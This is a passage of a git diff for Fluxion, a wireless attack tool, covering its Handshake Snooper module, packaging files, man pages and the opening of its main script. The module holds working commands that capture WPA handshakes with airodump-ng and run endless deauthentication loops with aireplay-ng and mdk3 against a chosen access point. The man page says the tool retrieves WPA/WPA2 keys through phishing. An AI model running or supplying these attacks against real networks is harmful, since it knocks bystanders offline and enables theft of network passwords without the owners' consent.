$HANDSHAKECaptorPID &> $FLUXIONOutputDevice fi HANDSHAKECaptorPID="" } -function handshake_snooper_start_captor() { +handshake_snooper_start_captor() { if [ "$HANDSHAKECaptorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi handshake_snooper_stop_captor - xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $APTargetChannel)" $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ - airodump-ng --ignore-negative-one -d $APTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $APTargetChannel -a $WIMonitor & + xterm $FLUXIONHoldXterm -title "Handshake Captor (CH $FluxionTargetChannel)" \ + $TOPLEFT -bg "#000000" -fg "#FFFFFF" -e \ + airodump-ng --ignore-negative-one -d $FluxionTargetMAC -w "$FLUXIONWorkspacePath/capture/dump" -c $FluxionTargetChannel -a $HandshakeSnooperJammerInterface & local parentPID=$! while [ ! "$HANDSHAKECaptorPID" ]; do @@ -115,14 +154,14 @@ function handshake_snooper_start_captor() { done } -function handshake_snooper_stop_deauthenticator() { +handshake_snooper_stop_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then kill $HANDSHAKEDeauthenticatorPID &>$FLUXIONOutputDevice fi HANDSHAKEDeauthenticatorPID="" } -function handshake_snooper_start_deauthenticator() { +handshake_snooper_start_deauthenticator() { if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Running" ]; then return 1; fi @@ -130,75 +169,133 @@ function handshake_snooper_start_deauthenticator() { # Prepare deauthenticators case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperMdk3MethodOption") echo "$APTargetMAC" >$FLUXIONWorkspacePath/mdk3_blacklist.lst ;; + "$HandshakeSnooperMdk3MethodOption") + echo "$FluxionTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst ;; esac # Start deauthenticators. case "$HANDSHAKEDeauthenticatorIdentifier" in - "$HandshakeSnooperAireplayMethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $APTargetMAC --ignore-negative-one $WIMonitor; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperAireplayMethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 aireplay-ng --deauth=100 -a $FluxionTargetMAC --ignore-negative-one $HandshakeSnooperJammerInterface; done" & + HANDSHAKEDeauthenticatorPID=$! ;; - "$HandshakeSnooperMdk3MethodOption") - xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \ - "while true; do sleep 7; timeout 3 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel; done" & - HANDSHAKEDeauthenticatorPID=$! + "$HandshakeSnooperMdk3MethodOption") + xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" \ + -title "Deauthenticating all clients on $FluxionTargetSSID" -e \ + "while true; do sleep 7; timeout 3 mdk3 $HandshakeSnooperJammerInterface d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $FluxionTargetChannel; done" & + HANDSHAKEDeauthenticatorPID=$! ;; esac } -function handshake_snooper_unset_deauthenticator_identifier() { + +handshake_snooper_unset_deauthenticator_identifier() { + if [ ! "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 1; fi HANDSHAKEDeauthenticatorIdentifier="" } -function handshake_snooper_set_deauthenticator_identifier() { +handshake_snooper_set_deauthenticator_identifier() { if [ "$HANDSHAKEDeauthenticatorIdentifier" ]; then return 0; fi handshake_snooper_unset_deauthenticator_identifier - local methods=("$HandshakeSnooperMonitorMethodOption" "$HandshakeSnooperAireplayMethodOption" "$HandshakeSnooperMdk3MethodOption" "$FLUXIONGeneralBackOption") + local methods=( + "$HandshakeSnooperMonitorMethodOption" + "$HandshakeSnooperAireplayMethodOption" + "$HandshakeSnooperMdk3MethodOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$HandshakeSnooperMethodQuery" methods[@] HANDSHAKEDeauthenticatorIdentifier=$IOQueryChoice echo - if [ "$HANDSHAKEDeauthenticatorIdentifier" = "$FLUXIONGeneralBackOption" ]; then + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$FLUXIONGeneralBackOption" ]; then handshake_snooper_unset_deauthenticator_identifier return 1 fi } -function handshake_snooper_unset_verifier_identifier() { +handshake_snooper_unset_jammer_interface() { + if [ ! "$HandshakeSnooperJammerInterface" ]; then return 1; fi + HandshakeSnooperJammerInterface="" + + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +handshake_snooper_set_jammer_interface() { + if [ "$HandshakeSnooperJammerInterface" ]; then return 0; fi + if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ + "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi + + if [ ! "$HandshakeSnooperUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$HandshakeSnooperUninitializedJammerInterface + unset HandshakeSnooperUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + HandshakeSnooperJammerInterface=${FluxionInterfaces[$selectedInterface]} +} + +handshake_snooper_unset_verifier_identifier() { + if [ ! "$HANDSHAKEVerifierIdentifier" ]; then return 1; fi HANDSHAKEVerifierIdentifier="" } -function handshake_snooper_set_verifier_identifier() { +handshake_snooper_set_verifier_identifier() { if [ "$HANDSHAKEVerifierIdentifier" ]; then return 0; fi handshake_snooper_unset_verifier_identifier - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") + local choices=( + "$FLUXIONHashVerificationMethodPyritOption" + "$FLUXIONHashVerificationMethodAircrackOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$FLUXIONHashVerificationMethodQuery" choices[@] echo case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") HANDSHAKEVerifierIdentifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") HANDSHAKEVerifierIdentifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_identifier - return 1 - ;; + "$FLUXIONHashVerificationMethodPyritOption") + HANDSHAKEVerifierIdentifier="pyrit" ;; + "$FLUXIONHashVerificationMethodAircrackOption") + HANDSHAKEVerifierIdentifier="aircrack-ng" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_identifier + return 1 + ;; esac } -function handshake_snooper_unset_verifier_interval() { +handshake_snooper_unset_verifier_interval() { + if [ ! "$HANDSHAKEVerifierInterval" ]; then return 1; fi HANDSHAKEVerifierInterval="" } -function handshake_snooper_set_verifier_interval() { +handshake_snooper_set_verifier_interval() { if [ "$HANDSHAKEVerifierInterval" ]; then return 0; fi handshake_snooper_unset_verifier_interval @@ -207,84 +304,136 @@ function handshake_snooper_set_verifier_interval() { io_query_choice "$HandshakeSnooperVerifierIntervalQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierInterval30SOption") HANDSHAKEVerifierInterval=30 ;; - "$HandshakeSnooperVerifierInterval60SOption") HANDSHAKEVerifierInterval=60 ;; - "$HandshakeSnooperVerifierInterval90SOption") HANDSHAKEVerifierInterval=90 ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_interval - return 1 - ;; + "$HandshakeSnooperVerifierInterval30SOption") + HANDSHAKEVerifierInterval=30 ;; + "$HandshakeSnooperVerifierInterval60SOption") + HANDSHAKEVerifierInterval=60 ;; + "$HandshakeSnooperVerifierInterval90SOption") + HANDSHAKEVerifierInterval=90 ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_interval + return 1 + ;; esac } -function handshake_snooper_unset_verifier_synchronicity() { +handshake_snooper_unset_verifier_synchronicity() { + if [ ! "$HANDSHAKEVerifierSynchronicity" ]; then return 1; fi HANDSHAKEVerifierSynchronicity="" } -function handshake_snooper_set_verifier_synchronicity() { +handshake_snooper_set_verifier_synchronicity() { if [ "$HANDSHAKEVerifierSynchronicity" ]; then return 0; fi handshake_snooper_unset_verifier_synchronicity - local choices=("$HandshakeSnooperVerifierSynchronicityAsynchronousOption" "$HandshakeSnooperVerifierSynchronicitySynchronousOption" "$FLUXIONGeneralBackOption") + local choices=( + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption" + "$HandshakeSnooperVerifierSynchronicitySynchronousOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$HandshakeSnooperVerifierSynchronicityQuery" choices[@] case "$IOQueryChoice" in - "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") HANDSHAKEVerifierSynchronicity="non-blocking" ;; - "$HandshakeSnooperVerifierSynchronicitySynchronousOption") HANDSHAKEVerifierSynchronicity="blocking" ;; - "$FLUXIONGeneralBackOption") - handshake_snooper_unset_verifier_synchronicity - return 1 - ;; + "$HandshakeSnooperVerifierSynchronicityAsynchronousOption") + HANDSHAKEVerifierSynchronicity="non-blocking" ;; + "$HandshakeSnooperVerifierSynchronicitySynchronousOption") + HANDSHAKEVerifierSynchronicity="blocking" ;; + "$FLUXIONGeneralBackOption") + handshake_snooper_unset_verifier_synchronicity + return 1 + ;; esac } -function unprep_attack() { + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if [ ! "$HandshakeSnooperCLIArguments" ]; then + if ! HandshakeSnooperCLIArguments=$( + getopt --options="v:i:j:a" \ + --longoptions="verifier:,interval:,jammer:,asynchronous" \ + --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit + fi + + declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments + + eval set -- "$HandshakeSnooperCLIArguments" # Set environment parameters. +fi + + +# ============================================================ # +# ============= < Argument Loaded Configurables > ============ # +# ============================================================ # +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -v|--verifier) + HandshakeSnooperVerifierIdentifier=$2; shift;; + -i|--interval) + HandshakeSnooperVerifierInterval=$2; shift;; + -j|--jammer) + HandshakeSnooperUninitializedJammerInterface=$2; shift;; + -a|--asynchronous) + HandshakeSnooperVerifierSynchronicity="non-blocking";; + esac + shift # Shift new parameters +done + + +# ============================================================ # +# ===================== < Fluxion Hooks > ==================== # +# ============================================================ # +attack_targetting_interfaces() { + interface_list_wireless + local interface + for interface in "${InterfaceListWireless[@]}"; do + echo "$interface" + done +} + +unprep_attack() { HandshakeSnooperState="Not Ready" handshake_snooper_unset_verifier_synchronicity handshake_snooper_unset_verifier_interval handshake_snooper_unset_verifier_identifier + handshake_snooper_unset_jammer_interface handshake_snooper_unset_deauthenticator_identifier sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" } -function prep_attack() { +prep_attack() { mkdir -p "$FLUXIONWorkspacePath/capture" - while true; do - handshake_snooper_set_deauthenticator_identifier - if [ $? -ne 0 ]; then break; fi - handshake_snooper_set_verifier_identifier - if [ $? -ne 0 ]; then - handshake_snooper_unset_deauthenticator_identifier - continue - fi - handshake_snooper_set_verifier_interval - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_identifier - continue - fi - handshake_snooper_set_verifier_synchronicity - if [ $? -ne 0 ]; then - handshake_snooper_unset_verifier_interval - continue - fi - HandshakeSnooperState="Ready" - break - done + IOUtilsHeader="handshake_snooper_header" - # Check for handshake abortion. - if [ "$HandshakeSnooperState" != "Ready" ]; then - unprep_attack + # Removed read-only due to local constant shadowing bug. + # I've reported the bug, we can add it when fixed. + local sequence=( + "set_deauthenticator_identifier" + "set_jammer_interface" + "set_verifier_identifier" + "set_verifier_interval" + "set_verifier_synchronicity" + ) + + if ! fluxion_do_sequence handshake_snooper sequence[@]; then return 1 fi + + HandshakeSnooperState="Ready" } -function stop_attack() { +stop_attack() { if [ "$HANDSHAKEArbiterPID" ]; then - kill -s SIGABRT $HANDSHAKEArbiterPID &>$FLUXIONOutputDevice + kill -s SIGABRT $HANDSHAKEArbiterPID &> $FLUXIONOutputDevice fi HANDSHAKEArbiterPID="" @@ -292,12 +441,12 @@ function stop_attack() { HandshakeSnooperState="Stopped" } -function start_attack() { +start_attack() { if [ "$HandshakeSnooperState" = "Running" ]; then return 0; fi if [ "$HandshakeSnooperState" != "Ready" ]; then return 1; fi HandshakeSnooperState="Running" - handshake_snooper_arbiter_daemon $$ &>$FLUXIONOutputDevice & + handshake_snooper_arbiter_daemon $$ &> $FLUXIONOutputDevice & HANDSHAKEArbiterPID=$! } diff --git a/attacks/Handshake Snooper/language/en.sh b/attacks/Handshake Snooper/language/en.sh index abf241a..23823e5 100755 --- a/attacks/Handshake Snooper/language/en.sh +++ b/attacks/Handshake Snooper/language/en.sh @@ -2,6 +2,8 @@ # identifier: Handshake Snopper # description: Acquires WPA/WPA2 encryption hashes. + +HandshakeSnooperJammerInterfaceQuery="Select an interface for jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Select a method of handshake retrieval" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)" diff --git a/bin/arch/PKGBUILD b/bin/arch/PKGBUILD new file mode 100644 index 0000000..3640785 --- /dev/null +++ b/bin/arch/PKGBUILD @@ -0,0 +1,66 @@ +# Maintainer: Cyberfee + +_pkgname=fluxion +pkgname=$_pkgname-git +pkgver=r1183.63b821f +pkgrel=1 +pkgdesc='Fluxion is a security auditing and social-engineering research tool' +url='https://github.com/FluxionNetwork/fluxion' +license=('GPL3') +source=('git://github.com/FluxionNetwork/fluxion.git#branch=master') + +depends=( + 'aircrack-ng' 'bash>=4.2' 'coreutils' + 'awk' 'iw' 'unzip' + 'curl' 'bc' 'xterm' +) + +makedepends=('binutils' 'coreutils' 'git') +conflicts=('fluxion-git') +provides=('fluxion-git') +sha256sums=('SKIP') +arch=('any') + +prepare() { + if [ -d "$srcdir/$pkgname" ]; then + rm -rf "$srcdir/$pkgname" + fi + + mkdir -p "$srcdir/$pkgname" + cd "$srcdir/$pkgname" +} + +pkgver() { + cd "$srcdir/$_pkgname" + + ( set -o pipefail + git describe --long 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)" + ) +} + +prepare() { + cd "$srcdir/$_pkgname" +} + +package() { + cd "$srcdir/$_pkgname" + + mkdir -p "$pkgdir/usr/bin" + mkdir -p "$pkgdir/usr/share/fluxion" + + install -Dm644 -t "$pkgdir/usr/share/doc/fluxion/" README.md + install -Dm644 LICENSE "$pkgdir/usr/share/licenses/airgeddon/LICENSE" + + rm -rf *.md .git* *.yml .project .editorconfig + + cp -a --no-preserve=ownership * "$pkgdir/usr/share/fluxion" + + cat > "$pkgdir/usr/bin/fluxion" << EOF +#!/bin/sh +cd /usr/share/fluxion +exec bash fluxion.sh "\${@}" +EOF + + chmod a+x "$pkgdir/usr/bin/fluxion" +} \ No newline at end of file diff --git a/docs/man/fluxion.1 b/docs/man/fluxion.1 new file mode 100644 index 0000000..bdd5454 --- /dev/null +++ b/docs/man/fluxion.1 @@ -0,0 +1,76 @@ +.TH FLUXION 1 "MARCH 2018" Linux "User Manuals" +.SH NAME +fluxion \- Fluxion is a security auditing and social-engineering research tool +.SH SYNOPSIS +.B fluxion [-debug] [-l +.I language +.B ] +.I attack +.B ... +.SH DESCRIPTION +.B fluxion is a security auditing and social-engineering research tool. +It is a remake of linset by vk496 with (hopefully) less bugs +and more functionality. The script attempts to retrieve the WPA/WPA2 +key from a target access point by means of a social engineering +(phising) attack. It's compatible with the latest release of Kali +(rolling). Fluxion's attacks' setup is mostly manual, +but experimental auto-mode handles some of the attacks' +setup parameters. +.SH OPTIONS +.IP "-v " +Print version number. +.IP "--help " +Print help page and exit with 0. +.IP "-m " +Run fluxion in manual mode instead of auto mode. +.IP "-k " +Kill wireless connection if it is connected. +.IP "-d " +Run fluxion in debug mode. +.IP "-x " +Try to run fluxion with xterm terminals instead of tmux. +.IP "-r " +Reload driver. +.IP "-l " +Define a certain language. +.IP "-e " +Select the target network based on the ESSID. +.IP "-c " +Indicate the channel(s) to listen to. +.IP "-a " +Define a certain attack. +.IP "--ratio " +Define the windows size. Bigger ratio -> smaller window size. +Default is 4. +.IP "-b " +Select the target network based on the access point MAC address. +.IP "-j " +Define a certain jamming interface. +.IP "-a " +Define a certain access point interface. +.SH FILES +.I /tmp/fluxspace/ +.RS +The system wide tmp directory. +.RE +.I $FLUXION/attacks/ +.RS +Folder where handshakes and passwords +are stored in. +.SH ENVIRONMENT +.IP FLUXIONAuto +Automatically run fluxion in auto mode if exported. +.IP FLUXIONDebug +Automatically run fluxion in debug mode if exported. +.IP FLUXIONWIKillProcesses +Automatically kill any interfering process(es). +.SH DIAGNOSTICS +Please checkout the other log files or use +the debug mode. +.SH BUGS +Please report any bugs at: +https://github.com/FluxionNetwork/fluxion/issues +.SH AUTHOR +Cyberfee, l3op, dlinkproto, vk496, MPX4132 +.SH "SEE ALSO" +.BR aircrack-ng (8), diff --git a/docs/man/fluxion.man b/docs/man/fluxion.man new file mode 100644 index 0000000..65fe62e --- /dev/null +++ b/docs/man/fluxion.man @@ -0,0 +1,92 @@ +FLUXION(1) User Manuals FLUXION(1) + + + +NAME + fluxion - Fluxion is a security auditing and social-engineering + research tool + +SYNOPSIS + fluxion [-debug] [-l language ] attack ... + +DESCRIPTION + fluxion is a security auditing and social-engineering research tool. + It is a remake of linset by vk496 with (hopefully) less bugs and more + functionality. The script attempts to retrieve the WPA/WPA2 key from a + target access point by means of a social engineering (phising) attack. + It's compatible with the latest release of Kali (rolling). Fluxion's + attacks' setup is mostly manual, but experimental auto-mode handles + some of the attacks' setup parameters. + +OPTIONS + -v Print version number. + + --help Print help page and exit with 0. + + -m Run fluxion in manual mode instead of auto mode. + + -k Kill wireless connection if it is connected. + + -d Run fluxion in debug mode. + + -x Try to run fluxion with xterm terminals instead of tmux. + + -r Reload driver. + + -l + Define a certain language. + + -e + Select the target network based on the ESSID. + + -c + Indicate the channel(s) to listen to. + + -a + Define a certain attack. + + --ratio + Define the windows size. Bigger ratio -> smaller window size. + Default is 4. + + -b + Select the target network based on the access point MAC address. + + -j + Define a certain jamming interface. + + -a + Define a certain access point interface. + +FILES + /tmp/fluxspace/ + The system wide tmp directory. + $FLUXION/attacks/ + Folder where handshakes and passwords are stored in. + +ENVIRONMENT + FLUXIONAuto + Automatically run fluxion in auto mode if exported. + + FLUXIONDebug + Automatically run fluxion in debug mode if exported. + + FLUXIONWIKillProcesses + Automatically kill any interfering process(es). + +DIAGNOSTICS + Please checkout the other log files or use the debug mode. + +BUGS + Please report any bugs at: https://github.com/FluxionNetwork/flux- + ion/issues + +AUTHOR + Cyberfee, l3op, dlinkproto, vk496, MPX4132 + +SEE ALSO + aircrack-ng(8), + + + +Linux MARCH 2018 FLUXION(1) \ No newline at end of file diff --git a/fluxion b/fluxion new file mode 100755 index 0000000..7477daa --- /dev/null +++ b/fluxion @@ -0,0 +1,1702 @@ +#!/bin/bash + +# ============================================================ # +# ================== < FLUXION Parameters > ================== # +# ============================================================ # +# Warning: The FLUXIONPath constant will be incorrectly set when +# called directly via a system link. System links in the path to +# the script, however, will be loaded correctly. + +# Path to directory containing the FLUXION executable script. +readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) + +# Path to the temp. directory available to FLUXION & subscripts. +readonly FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONIPTablesBackup="$FLUXIONPath/iptables-rules" + +# Path to FLUXION's preferences file, to be loaded afterward. +readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" + +# Constants denoting the reference noise floor & ceiling levels. +# These are used by the the wireless network scanner visualizer. +readonly FLUXIONNoiseFloor=-90 +readonly FLUXIONNoiseCeiling=-60 + +readonly FLUXIONVersion=4 +readonly FLUXIONRevision=4 + +# Declare window ration bigger = smaller windows +FLUXIONWindowRatio=4 + +# ============================================================ # +# ================= < Script Sanity Checks > ================= # +# ============================================================ # +if [ $EUID -ne 0 ]; then # Super User Check + echo -e "Aborted, please execute the script as root."; exit 1 +fi + +# ===================== < XTerm Checks > ===================== # +# TODO: Run the checks below only if we're not using tmux. +if [ ! "${DISPLAY:-}" ]; then # Assure display is available. + echo -e "Aborted, X (graphical) session unavailable."; exit 2 +fi + +if ! hash xdpyinfo 2>/dev/null; then # Assure display probe. + echo -e "Aborted, xdpyinfo is unavailable."; exit 3 +fi + +if ! xdpyinfo &>/dev/null; then # Assure display info available. + echo -e "Aborted, xterm test session failed."; exit 3 +fi + +# ================ < Parameter Parser Check > ================ # +getopt --test > /dev/null # Assure enhanced getopt (returns 4). +if [ $? -ne 4 ]; then + echo "Aborted, enhanced getopt isn't available."; exit 4 +fi + +# =============== < Working Directory Check > ================ # +if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null; then + echo "Aborted, can't generate a workspace directory."; exit 5 +fi + +# Once sanity check is passed, we can start to load everything. + + +# ============================================================ # +# =================== < Library Includes > =================== # +# ============================================================ # +source lib/installer/InstallerUtils.sh +source lib/InterfaceUtils.sh +source lib/SandboxUtils.sh +source lib/FormatUtils.sh +source lib/ColorUtils.sh +source lib/IOUtils.sh +source lib/HashUtils.sh +source lib/Help.sh + +# NOTE: These are configured after arguments are loaded (later). + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if ! FLUXIONCLIArguments=$( + getopt --options="vdkrnmtbh:e:c:l:a:h:r" \ + --longoptions="debug,version,killer,reloader,ratio,help,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 +fi + +AttackCLIArguments=${FLUXIONCLIArguments##*--} +readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} + + +# ============================================================ # +# ================== < Load Configurables > ================== # +# ============================================================ # + +# ============= < Argument Loaded Configurables > ============ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. + +[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. +while [ "$1" != "" -a "$1" != "--" ]; do + case "$1" in + -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; + -h|--help) fluxion_help; exit;; + -d|--debug) readonly FLUXIONDebug=1;; + -k|--killer) readonly FLUXIONWIKillProcesses=1;; + -r|--reloader) readonly FLUXIONWIReloadDriver=1;; + -n|--airmon-ng) readonly FLUXIONAirmonNG=1;; + -m|--multiplexer) readonly FLUXIONTMux=1;; + -b|--bssid) FluxionTargetMAC=$2; shift;; + --ratio) FLUXIONWindowRatio=$2;shift;; + -e|--essid) FluxionTargetSSID=$2; + FluxionTargetSSIDClean=$( + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + shift;; + -c|--channel) FluxionTargetChannel=$2; shift;; + -l|--language) FluxionLanguage=$2; shift;; + -a|--attack) FluxionAttack=$2; shift;; + esac + shift # Shift new parameters +done + +shift # Remove "--" to prepare for attacks to read parameters. +# Executable arguments are handled after subroutine definition. + +# =================== < User Preferences > =================== # +# Load user-defined preferences if there's an executable script. +# If no script exists, prepare one for the user to store config. +# WARNING: Preferences file must assure no redeclared constants. +if [ -x "$FLUXIONLanguagePreferencesFile" ]; then + source "$FLUXIONLanguagePreferencesFile" +else + echo '#!/bin/bash' > "$FLUXIONLanguagePreferencesFile" + chmod u+x "$FLUXIONLanguagePreferencesFile" +fi + +# ================ < Configurable Constants > ================ # +if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. + readonly FLUXIONAuto=${FLUXIONAuto:+1} +fi + +if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. + readonly FLUXIONDebug=${FLUXIONDebug:+1} +fi + +if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. + readonly FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} +fi + +if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. + readonly FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} +fi + +if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. + readonly FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} +fi + +# FLUXIONDebug [Normal Mode "" / Developer Mode 1] +if [ $FLUXIONDebug ]; then + readonly FLUXIONOutputDevice="/dev/stdout" + readonly FLUXIONHoldXterm="-hold" +else + readonly FLUXIONOutputDevice="/dev/null" + readonly FLUXIONHoldXterm="" +fi + +# ================ < Configurable Variables > ================ # +readonly FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " +FLUXIONPrompt=$FLUXIONPromptDefault + +readonly FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" +FLUXIONVLine=$FLUXIONVLineDefault + +# ================== < Library Parameters > ================== # +readonly InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" + +readonly SandboxWorkspacePath="$FLUXIONWorkspacePath" +readonly SandboxOutputDevice="$FLUXIONOutputDevice" + +readonly InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" +readonly InstallerUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InstallerUtilsNoticeMark="$FLUXIONVLine" + +readonly PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" + +declare IOUtilsHeader="fluxion_header" +readonly IOUtilsQueryMark="$FLUXIONVLine" +readonly IOUtilsPrompt="$FLUXIONPrompt" + +readonly HashOutputDevice="$FLUXIONOutputDevice" + + +# ============================================================ # +# =================== < Default Language > =================== # +# ============================================================ # +# Set by default in case fluxion is aborted before setting one. +source "$FLUXIONPath/language/en.sh" + + +# ============================================================ # +# ================== < Startup & Shutdown > ================== # +# ============================================================ # +fluxion_startup() { + if [ "$FLUXIONDebug" ]; then return 1; fi + + # Make sure that we save the iptable files + iptables-save >"$FLUXIONIPTablesBackup" + local banner=() + + format_center_literals \ + " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" + banner+=("$FormatCenterLiterals") + format_center_literals \ + "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" + banner+=("$FormatCenterLiterals") + + clear + + if [ "$FLUXIONAuto" ]; then + echo -e "$CBlu" + else + echo -e "$CRed" + fi + + for line in "${banner[@]}"; do + echo "$line"; sleep 0.05 + done + + echo # Do not remove. + + sleep 0.1 + local -r fluxionRepository="https://github.com/FluxionNetwork/fluxion" + format_center_literals "${CGrn}Site: ${CRed}$fluxionRepository$CClr" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" + local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" + local -r credits="by$CCyn FluxionNetwork$CClr" + format_center_literals "$versionInfo $revisionInfo $credits" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + local -r fluxionDomain="raw.githubusercontent.com" + local -r fluxionPath="FluxionNetwork/fluxion/master/fluxion.sh" + local -r updateDomain="github.com" + local -r updatePath="FluxionNetwork/fluxion/archive/master.zip" + if installer_utils_check_update "https://$fluxionDomain/$fluxionPath" \ + "FLUXIONVersion=" "FLUXIONRevision=" \ + $FLUXIONVersion $FLUXIONRevision; then + installer_utils_run_update "https://$updateDomain/$updatePath" \ + "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" \ + "$(dirname "$FLUXIONPath")" + fi + + echo # Do not remove. + + local requiredCLITools=( + "aircrack-ng" 